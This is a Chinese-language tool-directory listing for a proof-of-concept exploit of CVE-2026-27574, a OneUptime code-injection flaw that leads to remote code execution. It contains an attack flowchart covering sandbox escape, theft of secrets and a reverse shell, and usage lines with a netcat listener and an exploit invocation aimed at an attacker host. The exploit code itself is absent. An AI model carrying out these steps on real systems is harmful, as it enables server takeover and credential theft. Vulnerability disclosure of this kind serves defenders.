Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-27574-OneUptime-RCE — CVE-2026-27574 的概念验证漏洞利用程序,该漏洞是 OneUptime 中的一个严重代码注入漏洞,可实现远程代码执行和环境变量泄露。 | Kitploit
工具/GitHubGitHub/mbanyamer/cve-2026-27574-oneuptime-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubmbanyamer/cve-2026-27574-oneuptime-rce

CVE-2026-27574-OneUptime-RCE

CVE-2026-27574 的概念验证漏洞利用程序,该漏洞是 OneUptime 中的一个严重代码注入漏洞,可实现远程代码执行和环境变量泄露。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
156个月前尚未审核
分享

CVE-2026-27574-OneUptime-RCE

Author Role Country Platform Vulnerability CVE CVSS Status

概述

针对 CVE-2026-27574 的概念验证(PoC)漏洞利用程序——这是 OneUptime < 10.0.0 中的一个严重代码注入漏洞(CWE-94),允许在探针上下文中执行任意 JavaScript,从而导致完全远程代码执行(RCE) 以及敏感环境变量的泄露。

修复版本: OneUptime 10.0.0(迁移至 isolated-vm)

漏洞利用类型: 远程
认证要求: 低权限(任意已注册的项目成员)
影响: 服务器完全沦陷、凭据窃取、集群接管

攻击流程图

root@kitploit:~
flowchart TD
    A[开始] --> B[开放注册]
    B --> C[注册新账户]
    C --> D[创建新项目]
    D --> E[获取 ProjectMember 角色]
    E --> F[创建自定义 JavaScript 监控器]
    F --> G[注入恶意 vm 逃逸载荷]
    G --> H[探针每约 60 秒执行代码]
    H --> I[通过构造函数链逃逸 vm 上下文]
    I --> J[访问 process 与 child_process]
    J --> K[执行系统命令]
    J --> L[泄露环境变量]
    K --> M[读取 /etc/passwd、id、hostname 等]
    L --> N[提取 ONEUPTIME_SECRET、数据库/Redis 密码等]
    M --> O[实现完全 RCE]
    N --> O
    O --> P[可选:反向 Shell / 数据外泄]
    P --> Q[结束 - 系统已沦陷]

此 PoC 的功能

  • 自动账户注册
  • 项目创建
  • 恶意 JavaScript 监控器创建
  • 环境变量泄露
  • 基础命令执行验证
  • 可选反向 Shell 载荷(已注释)

使用方法

root@kitploit:~
# 启动监听器(如果使用反向 Shell)
nc -lvnp 4444

# 运行漏洞利用程序
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444

环境要求

  • Python 3.6+
  • requests 库(pip install requests)

法律与道德声明

此代码仅供教育和授权安全测试之用。
未经授权对您不拥有或未获明确许可测试的系统使用此代码,属于违法行为且不道德。

参考链接

  • GitHub 安全公告 GHSA-v264-xqh4-9xmm
  • 补丁提交

由 Mohammed Idrees Banyamer 开发 • 约旦 • @banyamer_security

下载工具